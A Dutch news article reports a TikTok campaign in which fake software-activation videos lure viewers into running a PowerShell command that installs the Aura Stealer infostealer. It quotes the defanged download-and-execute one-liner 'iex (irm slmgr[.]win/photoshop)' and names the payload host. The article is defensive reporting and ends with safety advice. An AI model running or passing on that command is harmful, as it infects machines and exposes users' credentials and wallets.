Dataconomy NL
Subscribe
No Result
View All Result
Dataconomy NL
Subscribe
No Result
View All Result
Dataconomy NL
No Result
View All Result

De nieuwste zwendel van TikTok leert gebruikers hoe ze hun eigen pc kunnen infecteren

byEmre Çıtak
20 oktober 2025
in Cybersecurity, News
Home Cybersecurity
Share on FacebookShare on Twitter

Cybercriminelen verspreiden informatiestelende malware op TikTok met behulp van video’s die zijn vermomd als gratis software-activeringsgidsen. Volgens BleepingComputerISC-handler Xavier Mertens identificeerde de lopende campagne, die gebruik maakt van een social engineering-methode die bekend staat als een ClickFix-aanval om computersystemen te infecteren. De video’s, waargenomen door BleepingComputerbeweren instructies te geven voor het activeren van legitieme software zoals Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro en Discord Nitro. De campagne promoot ook fictieve diensten, waaronder ‘Netflix Premium’ en ‘Spotify Premium’. Mertens merkte op dat deze activiteit grotendeels dezelfde is als een campagne die eerder in mei door beveiligingsbedrijf Trend Micro werd waargenomen. De video’s maken gebruik van een social engineering-techniek die een ogenschijnlijk geldige oplossing of reeks instructies presenteert om gebruikers te misleiden om hun eigen machines in gevaar te brengen. Deze ClickFix-aanval verleidt gebruikers ertoe kwaadaardige PowerShell-opdrachten uit te voeren. Elke video toont een opdracht van één regel, zoals `iex (irm slmgr[.]win/photoshop)`, en instrueert kijkers om het uit te voeren met beheerdersrechten. De programmanaam in de URL wordt aangepast zodat deze overeenkomt met de software die wordt nagebootst; een valse Windows-gids zou een URL gebruiken die ‘windows’ bevat in plaats van ‘photoshop’. Wanneer de opdracht wordt uitgevoerd, maakt PowerShell verbinding met de externe site `slmgr[.]win` om een ​​ander PowerShell-script op te halen en uit te voeren. Dit script downloadt twee uitvoerbare bestanden van Cloudflare-pagina’s. De eerste, van `https://file-epq[.]pagina’s[.]dev/updater.exe`, is een variant van de Aura Stealer-malware. Deze infostealer is ontworpen om opgeslagen browsergegevens, authenticatiecookies, cryptocurrency-portemonneegegevens en andere applicatiegegevens te verzamelen. De gestolen gegevens worden vervolgens geüpload naar de aanvallers, waardoor ze toegang krijgen tot de accounts van het slachtoffer. Een tweede payload, `source.exe`, wordt ook gedownload als onderdeel van de aanval. Volgens Mertens compileert dit uitvoerbare bestand zelf code met behulp van de ingebouwde Visual C# Compiler van .NET (`csc.exe`). De resulterende code wordt vervolgens rechtstreeks in het geheugen geïnjecteerd en gelanceerd. Het specifieke doel van deze extra lading blijft onduidelijk. Gebruikers die deze stappen hebben uitgevoerd, moeten er rekening mee houden dat al hun inloggegevens zijn aangetast. De aanbevolen handelwijze is om de wachtwoorden op alle sites en services die ze gebruiken onmiddellijk opnieuw in te stellen om ongeoorloofde accounttoegang en verdere gegevensdiefstal te voorkomen. ClickFix-aanvallen zijn het afgelopen jaar populair geworden en worden gebruikt om verschillende soorten malware te verspreiden in ransomware- en cryptocurrency-diefstalcampagnes. Als algemene regel geldt dat gebruikers nooit tekst van een website mogen kopiëren en deze in een dialoogvenster van een besturingssysteem moeten uitvoeren. Dit advies omvat de adresbalk van File Explorer, de opdrachtprompt, PowerShell-prompts, de macOS-terminal en Linux-shells.


Uitgelicht beeldtegoed

Tags: scamtiktok

Related Posts

Alibaba’s Qwen Code v0.5.0 transformeert terminal in een volledig ontwikkel-ecosysteem

Alibaba’s Qwen Code v0.5.0 transformeert terminal in een volledig ontwikkel-ecosysteem

26 december 2025
Bethesda mikt op 600 uur gameplay voor Fallout 5

Bethesda mikt op 600 uur gameplay voor Fallout 5

26 december 2025
ASUS verdedigt verkeerd uitgelijnde RTX 5090 HyperX-voedingspoort als "opzettelijk ontwerp"

ASUS verdedigt verkeerd uitgelijnde RTX 5090 HyperX-voedingspoort als "opzettelijk ontwerp"

26 december 2025
NVIDIA open source CUDA Tile IR op GitHub

NVIDIA open source CUDA Tile IR op GitHub

26 december 2025
CEO van MicroStrategy zegt Bitcoin-fundamentals "kan niet beter"

CEO van MicroStrategy zegt Bitcoin-fundamentals "kan niet beter"

26 december 2025
ChatGPT evolueert naar een kantoorsuite met nieuwe opmaakblokken

ChatGPT evolueert naar een kantoorsuite met nieuwe opmaakblokken

26 december 2025

Recent Posts

  • Alibaba’s Qwen Code v0.5.0 transformeert terminal in een volledig ontwikkel-ecosysteem
  • Bethesda mikt op 600 uur gameplay voor Fallout 5
  • ASUS verdedigt verkeerd uitgelijnde RTX 5090 HyperX-voedingspoort als "opzettelijk ontwerp"
  • NVIDIA open source CUDA Tile IR op GitHub
  • CEO van MicroStrategy zegt Bitcoin-fundamentals "kan niet beter"

Recent Comments

Geen reacties om weer te geven.
Dataconomy NL

COPYRIGHT © DATACONOMY MEDIA GMBH, ALL RIGHTS RESERVED.

  • Sample Page

Follow Us

  • Sample Page
No Result
View All Result
Subscribe

This website uses cookies. By continuing to use this website you are giving consent to cookies being used. Visit our Privacy Policy.